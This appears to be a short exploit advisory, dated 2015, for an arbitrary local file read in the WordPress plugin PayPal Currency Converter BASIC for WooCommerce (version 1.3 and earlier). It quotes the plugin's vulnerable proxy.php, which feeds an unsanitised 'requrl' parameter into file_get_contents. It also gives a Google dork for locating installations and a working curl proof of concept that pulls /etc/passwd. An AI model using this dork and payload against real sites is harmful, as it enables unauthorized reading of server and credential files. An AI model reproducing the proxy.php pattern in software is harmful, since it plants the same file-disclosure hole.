# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"# Date: 10/06/2015# Exploit Author: Kuroi'SH# Software Link:
PayPal Currency Converter BASIC for WooCommerce
# Version: <=1.3# Tested on: Linux
Description:
proxy.php's code:<?php
$file= file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a fileis printed out (unfortunately
not included) so any html file can be loaded,and an attacker may be able
to readany local file which
isnot executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
